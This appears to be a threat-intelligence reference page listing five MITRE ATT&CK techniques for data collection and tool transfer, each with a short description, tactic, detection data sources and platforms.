Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre